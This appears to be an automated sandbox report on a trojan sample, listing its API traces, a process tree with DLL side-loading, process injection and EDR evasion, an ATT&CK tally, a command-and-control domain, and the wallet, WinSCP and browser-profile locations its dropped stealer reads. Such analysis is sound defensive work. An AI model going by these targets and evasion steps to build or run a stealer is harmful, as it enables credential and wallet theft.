Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_6D483F9C
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_6D485593
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_6D4794E4
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoA,2_2_6D47B4F8
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoW,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,2_2_6D4854B9
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_6D483340
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,3_2_6C63750C
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,3_2_6C63767A
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,3_2_6C637270
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6C6AF2EF
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,3_2_6C6352E4
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6C6AF356
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,3_2_6C6373B4
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0092BB84 ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle,LocalFree,1_2_0092BB84
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0096A805 EnterCriticalSection,GetCurrentProcessId,GetCurrentThreadId,GetLocalTime,LeaveCriticalSection,1_2_0096A805
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_00919360 GetUserNameW,GetLastError,1_2_00919360
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0097BA41 GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,1_2_0097BA41
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D4628F4 __EH_prolog3_GS,_memset,GetVersionExW,GetVersionExW,GetVersionExW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,2_2_6D4628F4
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\y572q81e.default
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Directory queried: C:\Users\user\Documents
ATT&CK Matrix (tactic: matched techniques, with the match count shown in the report; unmatched template cells of the matrix are omitted)

Reconnaissance: no matched techniques
Resource Development: no matched techniques
Initial Access: no matched techniques
Execution: Native API (3), Command and Scripting Interpreter (2), Service Execution (1)
Persistence: DLL Side-Loading (11), Windows Service (1)
Privilege Escalation: Abuse Elevation Control Mechanism (1), DLL Side-Loading (11), Access Token Manipulation (1), Windows Service (1), Process Injection (213)
Defense Evasion: Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (4), Software Packing (1), DLL Side-Loading (11), File Deletion (1), Masquerading (21), Virtualization/Sandbox Evasion (11), Access Token Manipulation (1), Process Injection (213)
Credential Access: OS Credential Dumping (1), Credentials in Registry (1)
Discovery: System Time Discovery (12), Account Discovery (1), File and Directory Discovery (13), System Information Discovery (147), Security Software Discovery (221), Process Discovery (3), Virtualization/Sandbox Evasion (11), System Owner/User Discovery (1)
Lateral Movement: no matched techniques
Collection: Archive Collected Data (11), Data from Local System (11)
Command and Control: Ingress Tool Transfer (2), Encrypted Channel (21), Non-Application Layer Protocol (3), Application Layer Protocol (14)
Exfiltration: no matched techniques
Impact: no matched techniques
Behavior Graph ID: 1586711 | Sample: kXzODlqJak.exe | Startdate: 09/01/2025 | Architecture: WINDOWS | Score: 92

Start (sample)
  DNS/IP: bamarelakij.site; api.msn.com
  Signatures: Multi AV Scanner detection for submitted file; AI detected suspicious sample
  |- kXzODlqJak.exe 8
  |    Dropped: C:\Windows\Temp\...\kXzODlqJak.exe (PE32)
  |    |- kXzODlqJak.exe 21
  |         Dropped: C:\Windows\Temp\...\RescueCDBurner.exe (PE32); C:\Windows\Temp\...\msvcr100.dll (PE32); C:\Windows\Temp\...\msvcp100.dll (PE32); 6 other files (none is malicious)
  |         Signatures: Multi AV Scanner detection for dropped file
  |         |- RescueCDBurner.exe 11
  |              Dropped: C:\Users\user\AppData\...\RescueCDBurner.exe (PE32); C:\Users\user\AppData\...\msvcr100.dll (PE32); C:\Users\user\AppData\...\msvcp100.dll (PE32); 5 other files (none is malicious)
  |              Signatures: Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR)
  |              |- RescueCDBurner.exe 1
  |                   Signatures: Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR)
  |                   |- cmd.exe 5
  |                        Dropped: C:\Users\user\...\LocalCtrl_alpha_v3.exe (PE32+); C:\Users\user\AppData\Local\Temp\oeqwwe (PE32+)
  |                        Signatures: Writes to foreign memory regions; Found hidden mapped module (file has been removed from disk); Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  |                        |- LocalCtrl_alpha_v3.exe
  |                        |    DNS/IP: bamarelakij.site 104.21.80.52, 443, 49973, 49974 CLOUDFLARENETUS United States
  |                        |    Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to harvest and steal Bitcoin Wallet information; Found direct / indirect Syscall (likely to bypass EDR)
  |                        |    |- msedge.exe
  |                        |         |- msedge.exe
  |                        |- conhost.exe
  |- RescueCDBurner.exe 1
  |    Signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
  |    |- cmd.exe 2
  |         Dropped: C:\Users\user\AppData\Local\...\qpfwaekftwavc (PE32+)
  |         Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
  |         |- LocalCtrl_alpha_v3.exe
  |         |    Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to harvest and steal browser information (history, passwords, etc)
  |         |- conhost.exe
  |- msedge.exe
       DNS/IP: 192.168.2.7, 123, 138, 443 unknown unknown; 239.255.255.250 unknown Reserved
       |- msedge.exe
       |    DNS/IP: 18.173.219.111, 443, 50029, 50038 MIT-GATEWAYSUS United States; 20.110.205.119, 443, 50028, 50057 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; 17 other IPs or domains
       |- msedge.exe
       |- msedge.exe
       |- msedge.exe

Source | Detection | Scanner | Label
kXzODlqJak.exe | 45% | ReversingLabs | Win32.Trojan.Nekark
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtCore4.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtGui4.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtNetwork4.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtXml4.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | 3% | ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\StarBurn.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcp100.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcr100.dll | 0% | ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\Ascidian.dll | 0% | ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtCore4.dll | 0% | ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtGui4.dll | 0% | ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtNetwork4.dll | 0% | ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtXml4.dll | 0% | ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | 3% | ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\StarBurn.dll | 0% | ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcp100.dll | 0% | ReversingLabs
C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcr100.dll | 0% | ReversingLabs
C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | 29% | ReversingLabs | Win32.Trojan.Generic
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
chrome.cloudflare-dns.com | 162.159.61.3 | true | false | | high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false | | high
sb.scorecardresearch.com | 18.244.18.38 | true | false | | high
bamarelakij.site | 104.21.80.52 | true | false | | high
bzib.nelreports.net | unknown | unknown | false | | high
assets.msn.com | unknown | unknown | false | | high
c.msn.com | unknown | unknown | false | | high
ntp.msn.com | unknown | unknown | false | | high
api.msn.com | unknown | unknown | false | | high
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://b.chenall.net/menu.lstRescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://isecure-a.reneelab.com/webapi.php?code=RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0DRescueCDBurner.exe, 00000003.00000002.1514336862.000000006C859000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1576336443.000000006D789000.00000002.00000001.01000000.00000013.sdmp, RescueCDBurner.exe, 00000008.00000002.1846154668.000000006D889000.00000002.00000001.01000000.00000013.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.softwareok.deRescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://grub4dos.chenall.net/e/%u)RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://wixtoolset.org/schemas/v4/2008/BurnHdPmykXzODlqJak.exe, 00000002.00000002.1485862396.00000000051F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?acRescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.reneelab.es/RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipboRescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.reneelab.comRescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstoreRescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://bugreports.qt-project.org/RescueCDBurner.exe, 00000003.00000002.1514336862.000000006C859000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1576336443.000000006D789000.00000002.00000001.01000000.00000013.sdmp, RescueCDBurner.exe, 00000008.00000002.1846154668.000000006D889000.00000002.00000001.01000000.00000013.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.reneelab.com.cn/RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.reneelab.pl/RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespaRescueCDBurner.exe, 00000003.00000002.1514140369.000000006C789000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1576085712.000000006D6B9000.00000002.00000001.01000000.00000015.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.phreedom.org/md5)RescueCDBurner.exe, 00000003.00000002.1514336862.000000006C859000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1576336443.000000006D789000.00000002.00000001.01000000.00000013.sdmp, RescueCDBurner.exe, 00000008.00000002.1846154668.000000006D889000.00000002.00000001.01000000.00000013.sdmpfalse
                                                  high
                                                  http://wixtoolset.org/schemas/v4/BundleExtensionDatakXzODlqJak.exe, 00000002.00000003.1482060334.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000002.00000003.1482136142.0000000002E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.reneelab.comwww.reneelab.comhttp://https://0RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003UserRescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.reneelab.kr/RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.reneelab.jp/RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://xml.org/sax/features/namespacesRescueCDBurner.exe, 00000003.00000002.1514140369.000000006C789000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1576085712.000000006D6B9000.00000002.00000001.01000000.00000015.sdmpfalse
                                                    high
                                                    https://bamarelakij.site/roiLocalCtrl_alpha_v3.exe, 0000000C.00000003.2216963257.0000000000541000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
